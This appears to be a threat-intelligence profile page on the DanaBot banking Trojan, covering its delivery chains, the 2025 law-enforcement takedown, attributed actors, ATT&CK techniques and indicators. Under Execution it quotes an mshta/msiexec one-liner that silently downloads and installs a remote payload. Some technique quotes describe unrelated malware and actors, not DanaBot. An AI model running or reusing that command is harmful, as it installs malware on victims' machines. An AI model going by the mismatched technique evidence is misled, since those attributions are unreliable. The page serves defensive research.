DanaBot
DanaBot is a modular malware family first observed in 2018 and widely described as a banking Trojan that also operates as a broader information-stealing and malware-delivery platform. It is commercialized in cybercriminal ecosystems and has been operated under a malware-as-a-service model with multiple affiliates. Reporting links its development and operation to SCULLY SPIDER, and Microsoft maps related financially motivated activity to Storm-1044. One report also notes that U.S. authorities described two DanaBot variants, including one used for cybercrime and one for espionage.
High-confidence reporting in the provided content states that DanaBot spreads through phishing emails and has been used in large-scale global cybercrime campaigns. Its primary theft objectives include banking credentials, browser data, personal information, and other valuable information. Additional reporting says newer activity targeted financial institutions, cryptocurrency wallets, and individual victims. DanaBot has also been used to facilitate access for other malware families, and content explicitly states it has been used to facilitate or deliver malware including TrickBot, DoppelDridex, Zloader, and Latrodectus; other reporting notes loaders such as HijackLoader/IDAT Loader and Matanbuchus have distributed DanaBot.
The malware remained highly active until May 2025, when it was targeted in Operation Endgame actions and related law-enforcement disruptions. Multiple sources in the content state that DanaBot infrastructure and operators were disrupted or targeted by international law enforcement, including Operation Endgame actions in 2025, and that researchers leveraged a HeartBleed-like C2 memory leak vulnerability dubbed DanaBleed to gain visibility into operator data and support the takedown. Despite disruption, the content states DanaBot resurfaced in November 2025 with "Version 669," and its developers later announced a complete code revision claiming improved speed and stability.
Operationally, the content associates DanaBot with command-and-control infrastructure that was difficult to detect at scale. One report states that during 2025 activity DanaBot maintained nearly 150 active C2 servers per day and about 1,000 daily victims across more than 40 countries, with only a minority of C2 infrastructure showing positive VirusTotal detections. The content also places DanaBot among botnets and malware families subjected to repeated law-enforcement scrutiny and disruption since 2021.
Observed delivery and ecosystem relationships in the provided material include phishing-based infection, use by TA578 in at least one chain to deliver Latrodectus via an existing DanaBot infection, and distribution by third-party loaders including HijackLoader/IDAT Loader and Matanbuchus. The content also mentions DanaBot in connection with ClickFix-style campaigns and XWorm/DanaBot-associated PowerShell delivery infrastructure. Overall, the supplied reporting consistently characterizes DanaBot as a modular, persistently updated banking Trojan and infostealer that evolved into a broader access-and-delivery platform used in financially motivated cybercrime operations worldwide.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
SCULLY SPIDER develops and operates the DanaBot botnet, which originated primarily as a banking Trojan but expanded beyond banking in 2021 and has since been used to facilitate access for other types of malware, including TrickBot, DoppelDridex, and Zloader.
In one campaign observed on 15 December 2023, Proofpoint observed TA578 deliver the Latrodectus downloader via a DanaBot infection.
"US Takes Down DanaBot Malware, Indicts Developers" ... "Unusually, there are two DanaBot variants: One for cybercrime and one for espionage."
Techniques & procedures
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique"Most recently, the malvertising-based Fallout exploit kit chain has been used to deliver instances of Maze ransomware"
Initial Access
2 techniquesLatrodectus - a sophisticated malware loader first spotted in 2023 used by threat actors like TA578 in phishing campaigns... it is delivered via malicious email attachments.
The actor did not use thread hijacking, but instead used a variety of different subjects with URLs in the email body. The URLs led to the download of a JavaScript file.
Execution
3 techniquesCampaigns frequently rely on multi-stage, fileless execution chains involving PowerShell and HTA scripts.
mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (...) do Msiexec /i http://%i/3EBCE3A4.Png /Q",0)(window.close)
"...a command to be copied to the users' clipboard... guided to run a PowerShell command on Windows... substituted by a shell script... on macOS."
Stealth
4 techniquesThe HTA decodes the next payload from an array of character codes and launches it... The downloaded PowerShell script is heavily obfuscated... We observed obfuscation techniques unique to each campaign, aiming to mask keywords that trigger alerts in EDRs and SIEMs.
"The starting point of the attack is a web page that impersonates Spectrum ("panel-spectrum[.]net" or "spectrum-ticket[.]net")."; "...email phishing campaign that spoofs Booking.com..."
The script block contains a minimal JavaScript loader that implements a Base64 decoding function... The main function decodes and executes the embedded script.
Attackers continue to exploit Microsoft HTML Application Host (MSHTA)... a legacy utility available by default on Windows systems that can execute VBScript and JavaScript from local or remote files.
Credential Access
1 techniqueCollection
2 techniquesDanaBot – initially discovered as a modular banking Trojan in 2018... It primarily aims to steal banking credentials, browser data, and personal information.
Command and Control
4 techniquesBeginning in December 2022 and running into November 2024, that campaign infiltrated 33 separate Storm-0156 C2 nodes. Investigators later documented 37 Secret Blizzard and Storm-0156 C2 nodes tied to the operation.
"The new malware utilizes SOCKS5 proxies to mask network traffic to and from Command and Control (C&C) infrastructure..." / "...sets up SOCKS5 proxies on victim computers that can then be used by threat actors to tunnel/hide the malicious traffic associated with other malware."
Following Operation Endgame II, DanaBot resurfaced in November 2025 with “Version 669”—leveraging complex multi-stage attacks to target financial institutions, cryptocurrency wallets, and individual victims.
On 15 December 2023, Proofpoint observed TA578 deliver the Latrodectus downloader via a DanaBot infection.
Impact
2 techniquesDeploying ransomware through which cyber actors remove victim access to data (usually via encryption), potentially causing significant disruption to operations.
Recent Russian state-sponsored cyber operations have included distributed denial-of-service (DDoS) attacks... The primary distinguishing characteristic of the group is its operations use techniques aimed at causing disruptive or destructive effects at targeted organizations using DDoS attacks or wiper malware.
IOCs tracked for this family
4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
46 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Banking trojan/botnet conducting complex multi-stage attacks against financial institutions, cryptocurrency wallets, and individuals across 40+ countries.
Named as one of the malicious networks or malware operations disrupted during the broader crackdown on cybercrime infrastructure.
Named as a botnet that has faced law enforcement scrutiny since 2021.
A named malware family mentioned as one of the payloads distributed by HijackLoader.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.